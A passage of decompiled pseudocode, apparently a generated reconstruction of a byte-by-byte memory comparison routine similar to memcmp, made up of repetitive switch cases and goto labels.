                  								L327:
                  								__esi =  *(__eax - 5) & 0x000000ff;
                  								__edx =  *(__ecx - 5) & 0x000000ff;
                  								__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                  								if(__esi == 0) {
                  									L329:
                  									__esi =  *(__eax - 4) & 0x000000ff;
                  									__edx =  *(__ecx - 4) & 0x000000ff;
                  									__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                  									if(__esi == 0) {
                  										L331:
                  										__esi =  *(__eax - 3) & 0x000000ff;
                  										__edx =  *(__ecx - 3) & 0x000000ff;
                  										__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L334;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L331;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L329;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L327;
                  						case 7:
                  							L405:
                  							__edx =  *(__eax - 7);
                  							if( *(__eax - 7) ==  *(__ecx - 7)) {
                  								__esi = 0;
                  								L415:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L416;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 7) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                  							if(__esi == 0) {
                  								L408:
                  								__esi =  *(__eax - 6) & 0x000000ff;
                  								__edx =  *(__ecx - 6) & 0x000000ff;
                  								__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                  								if(__esi == 0) {
                  									L410:
                  									__esi =  *(__eax - 5) & 0x000000ff;
                  									__edx =  *(__ecx - 5) & 0x000000ff;
                  									__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                  									if(__esi == 0) {
                  										L412:
                  										__esi =  *(__eax - 4) & 0x000000ff;
                  										__edx =  *(__ecx - 4) & 0x000000ff;
                  										__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L415;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L412;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L410;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L408;
                  						case 8:
                  							L154:
                  							__edx =  *(__eax - 8);
                  							if( *(__eax - 8) ==  *(__ecx - 8)) {
                  								__esi = 0;
                  								L164:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L165;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 8) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                  							if(__esi == 0) {
                  								L157:
                  								__esi =  *(__eax - 7) & 0x000000ff;
                  								__edx =  *(__ecx - 7) & 0x000000ff;
                  								__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                  								if(__esi == 0) {
                  									L159:
                  									__esi =  *(__eax - 6) & 0x000000ff;
                  									__edx =  *(__ecx - 6) & 0x000000ff;
                  									__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                  									if(__esi == 0) {
                  										L161:
                  										__esi =  *(__eax - 5) & 0x000000ff;
                  										__edx =  *(__ecx - 5) & 0x000000ff;
                  										__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L164;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L161;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L159;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L157;
                  						case 9:
                  							L234:
                  							__edx =  *(__eax - 9);
                  							if( *(__eax - 9) ==  *(__ecx - 9)) {
                  								__esi = 0;
                  								L244:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L245;
                  							}
                  							__edx =  *(__ecx - 9) & 0x000000ff;
                  							__esi =  *(__eax - 9) & 0x000000ff;
                  							__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                  							if(__esi == 0) {
                  								L237:
                  								__esi =  *(__eax - 8) & 0x000000ff;
                  								__edx =  *(__ecx - 8) & 0x000000ff;
                  								__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                  								if(__esi == 0) {
                  									L239:
                  									__esi =  *(__eax - 7) & 0x000000ff;
                  									__edx =  *(__ecx - 7) & 0x000000ff;
                  									__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                  									if(__esi == 0) {
                  										L241:
                  										__esi =  *(__eax - 6) & 0x000000ff;
                  										__edx =  *(__ecx - 6) & 0x000000ff;
                  										__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L244;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L241;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L239;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L237;
                  						case 0xa:
                  							L313:
                  							__edx =  *(__eax - 0xa);
                  							if( *(__eax - 0xa) ==  *(__ecx - 0xa)) {
                  								__esi = 0;
                  								L323:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L324;
                  							}
                  							__edx =  *(__ecx - 0xa) & 0x000000ff;
                  							__esi =  *(__eax - 0xa) & 0x000000ff;
                  							__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                  							if(__esi == 0) {
                  								L316:
                  								__edx =  *(__ecx - 9) & 0x000000ff;
                  								__esi =  *(__eax - 9) & 0x000000ff;
                  								__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                  								if(__esi == 0) {
                  									L318:
                  									__edx =  *(__ecx - 8) & 0x000000ff;
                  									__esi =  *(__eax - 8) & 0x000000ff;
                  									__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                  									if(__esi == 0) {
                  										L320:
                  										__edx =  *(__ecx - 7) & 0x000000ff;
                  										__esi =  *(__eax - 7) & 0x000000ff;
                  										__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L323;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L320;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L318;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L316;
                  						case 0xb:
                  							L394:
                  							__edx =  *(__eax - 0xb);
                  							if( *(__eax - 0xb) ==  *(__ecx - 0xb)) {
                  								__esi = 0;
                  								L404:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L405;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0xb) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                  							if(__esi == 0) {
                  								L397:
                  								__esi =  *(__eax - 0xa) & 0x000000ff;
                  								__edx =  *(__ecx - 0xa) & 0x000000ff;
                  								__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                  								if(__esi == 0) {
                  									L399:
                  									__esi =  *(__eax - 9) & 0x000000ff;
                  									__edx =  *(__ecx - 9) & 0x000000ff;
                  									__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                  									if(__esi == 0) {
                  										L401:
                  										__esi =  *(__eax - 8) & 0x000000ff;
                  										__edx =  *(__ecx - 8) & 0x000000ff;
                  										__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L404;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L401;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L399;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L397;
                  						case 0xc:
                  							L143:
                  							__edx =  *(__eax - 0xc);
                  							if( *(__eax - 0xc) ==  *(__ecx - 0xc)) {
                  								__esi = 0;
                  								L153:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L154;
                  							}
                  							__edx =  *(__ecx - 0xc) & 0x000000ff;
                  							__esi =  *(__eax - 0xc) & 0x000000ff;
                  							__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                  							if(__esi == 0) {
                  								L146:
                  								__esi =  *(__eax - 0xb) & 0x000000ff;
                  								__edx =  *(__ecx - 0xb) & 0x000000ff;
                  								__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                  								if(__esi == 0) {
                  									L148:
                  									__esi =  *(__eax - 0xa) & 0x000000ff;
                  									__edx =  *(__ecx - 0xa) & 0x000000ff;
                  									__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                  									if(__esi == 0) {
                  										L150:
                  										__esi =  *(__eax - 9) & 0x000000ff;
                  										__edx =  *(__ecx - 9) & 0x000000ff;
                  										__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L153;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L150;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L148;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L146;
                  						case 0xd:
                  							L223:
                  							__edx =  *(__eax - 0xd);
                  							if( *(__eax - 0xd) ==  *(__ecx - 0xd)) {
                  								__esi = 0;
                  								L233:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L234;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0xd) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                  							if(__esi == 0) {
                  								L226:
                  								__esi =  *(__eax - 0xc) & 0x000000ff;
                  								__edx =  *(__ecx - 0xc) & 0x000000ff;
                  								__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                  								if(__esi == 0) {
                  									L228:
                  									__esi =  *(__eax - 0xb) & 0x000000ff;
                  									__edx =  *(__ecx - 0xb) & 0x000000ff;
                  									__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                  									if(__esi == 0) {
                  										L230:
                  										__esi =  *(__eax - 0xa) & 0x000000ff;
                  										__edx =  *(__ecx - 0xa) & 0x000000ff;
                  										__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L233;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L230;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L228;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L226;
                  						case 0xe:
                  							L302:
                  							__edx =  *(__eax - 0xe);
                  							if( *(__eax - 0xe) ==  *(__ecx - 0xe)) {
                  								__esi = 0;
                  								L312:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L313;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0xe) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                  							if(__esi == 0) {
                  								L305:
                  								__esi =  *(__eax - 0xd) & 0x000000ff;
                  								__edx =  *(__ecx - 0xd) & 0x000000ff;
                  								__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                  								if(__esi == 0) {
                  									L307:
                  									__esi =  *(__eax - 0xc) & 0x000000ff;
                  									__edx =  *(__ecx - 0xc) & 0x000000ff;
                  									__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                  									if(__esi == 0) {
                  										L309:
                  										__esi =  *(__eax - 0xb) & 0x000000ff;
                  										__edx =  *(__ecx - 0xb) & 0x000000ff;
                  										__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L312;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L309;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L307;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L305;
                  						case 0xf:
                  							L383:
                  							__edx =  *(__eax - 0xf);
                  							if( *(__eax - 0xf) ==  *(__ecx - 0xf)) {
                  								__esi = 0;
                  								L393:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L394;
                  							}
                  							__edx =  *(__ecx - 0xf) & 0x000000ff;
                  							__esi =  *(__eax - 0xf) & 0x000000ff;
                  							__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                  							if(__esi == 0) {
                  								L386:
                  								__esi =  *(__eax - 0xe) & 0x000000ff;
                  								__edx =  *(__ecx - 0xe) & 0x000000ff;
                  								__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                  								if(__esi == 0) {
                  									L388:
                  									__esi =  *(__eax - 0xd) & 0x000000ff;
                  									__edx =  *(__ecx - 0xd) & 0x000000ff;
                  									__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                  									if(__esi == 0) {
                  										L390:
                  										__esi =  *(__eax - 0xc) & 0x000000ff;
                  										__edx =  *(__ecx - 0xc) & 0x000000ff;
                  										__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L393;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L390;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L388;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L386;
                  						case 0x10:
                  							L132:
                  							__edx =  *(__eax - 0x10);
                  							if( *(__eax - 0x10) ==  *(__ecx - 0x10)) {
                  								__esi = 0;
                  								L142:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L143;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x10) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                  							if(__esi == 0) {
                  								L135:
                  								__esi =  *(__eax - 0xf) & 0x000000ff;
                  								__edx =  *(__ecx - 0xf) & 0x000000ff;
                  								__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                  								if(__esi == 0) {
                  									L137:
                  									__esi =  *(__eax - 0xe) & 0x000000ff;
                  									__edx =  *(__ecx - 0xe) & 0x000000ff;
                  									__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                  									if(__esi == 0) {
                  										L139:
                  										__esi =  *(__eax - 0xd) & 0x000000ff;
                  										__edx =  *(__ecx - 0xd) & 0x000000ff;
                  										__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L142;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L139;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L137;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L135;
                  						case 0x11:
                  							L212:
                  							__edx =  *(__eax - 0x11);
                  							if( *(__eax - 0x11) ==  *(__ecx - 0x11)) {
                  								__esi = 0;
                  								L222:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L223;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x11) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                  							if(__esi == 0) {
                  								L215:
                  								__esi =  *(__eax - 0x10) & 0x000000ff;
                  								__edx =  *(__ecx - 0x10) & 0x000000ff;
                  								__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                  								if(__esi == 0) {
                  									L217:
                  									__esi =  *(__eax - 0xf) & 0x000000ff;
                  									__edx =  *(__ecx - 0xf) & 0x000000ff;
                  									__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                  									if(__esi == 0) {
                  										L219:
                  										__esi =  *(__eax - 0xe) & 0x000000ff;
                  										__edx =  *(__ecx - 0xe) & 0x000000ff;
                  										__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L222;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L219;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L217;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L215;
                  						case 0x12:
                  							L291:
                  							__edx =  *(__eax - 0x12);
                  							if( *(__eax - 0x12) ==  *(__ecx - 0x12)) {
                  								__esi = 0;
                  								L301:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L302;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x12) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                  							if(__esi == 0) {
                  								L294:
                  								__esi =  *(__eax - 0x11) & 0x000000ff;
                  								__edx =  *(__ecx - 0x11) & 0x000000ff;
                  								__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                  								if(__esi == 0) {
                  									L296:
                  									__esi =  *(__eax - 0x10) & 0x000000ff;
                  									__edx =  *(__ecx - 0x10) & 0x000000ff;
                  									__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                  									if(__esi == 0) {
                  										L298:
                  										__esi =  *(__eax - 0xf) & 0x000000ff;
                  										__edx =  *(__ecx - 0xf) & 0x000000ff;
                  										__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L301;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L298;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L296;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L294;
                  						case 0x13:
                  							L372:
                  							__edx =  *(__eax - 0x13);
                  							if( *(__eax - 0x13) ==  *(__ecx - 0x13)) {
                  								__esi = 0;
                  								L382:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L383;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x13) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                  							if(__esi == 0) {
                  								L375:
                  								__esi =  *(__eax - 0x12) & 0x000000ff;
                  								__edx =  *(__ecx - 0x12) & 0x000000ff;
                  								__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                  								if(__esi == 0) {
                  									L377:
                  									__esi =  *(__eax - 0x11) & 0x000000ff;
                  									__edx =  *(__ecx - 0x11) & 0x000000ff;
                  									__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                  									if(__esi == 0) {
                  										L379:
                  										__esi =  *(__eax - 0x10) & 0x000000ff;
                  										__edx =  *(__ecx - 0x10) & 0x000000ff;
                  										__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                  										if(__esi != 0) {
                  											0 = 0 | __esi > 0x00000000;
                  											__edx = (__esi > 0) + (__esi > 0) - 1;
                  											__esi = (__esi > 0) + (__esi > 0) - 1;
                  										}
                  										goto L382;
                  									}
                  									0 = 0 | __esi > 0x00000000;
                  									__edx = (__esi > 0) + (__esi > 0) - 1;
                  									__esi = __edx;
                  									if(__edx != 0) {
                  										goto L98;
                  									}
                  									goto L379;
                  								}
                  								0 = 0 | __esi > 0x00000000;
                  								__edx = (__esi > 0) + (__esi > 0) - 1;
                  								__esi = __edx;
                  								if(__edx != 0) {
                  									goto L98;
                  								}
                  								goto L377;
                  							}
                  							0 = 0 | __esi > 0x00000000;
                  							__edx = (__esi > 0) + (__esi > 0) - 1;
                  							__esi = __edx;
                  							if(__edx != 0) {
                  								goto L98;
                  							}
                  							goto L375;
                  						case 0x14:
                  							L121:
                  							__edx =  *(__eax - 0x14);
                  							if( *(__eax - 0x14) ==  *(__ecx - 0x14)) {
                  								__esi = 0;
                  								L131:
                  								if(__esi != 0) {
                  									goto L98;
                  								}
                  								goto L132;
                  							}
                  							__esi = __dl & 0x000000ff;
                  							__edx =  *(__ecx - 0x14) & 0x000000ff;
                  							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x14) & 0x000000ff);
                  							if(__esi == 0) {
                  								L124:
                  								__esi =  *(__eax - 0x13) & 0x000000ff;
                  								__edx =  *(__ecx - 0x13) & 0x000000ff;
                  								__esi = ( *(__eax - 0x13) & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                  								if(__esi == 0) {
                  									L126:
                  									__esi =  *(__eax - 0x12) & 0x000000ff;
                  									__edx =  *(__ecx - 0x12) & 0x000000ff;
                  									__esi = ( *(__eax - 0x12) & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                  									if(__esi == 0) {
                  										L128:
                  										__esi =  *(__eax - 0x11) & 0x000000ff;
                  										__edx =  *(__ecx - 0x11) & 0x000000ff;
                  										__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
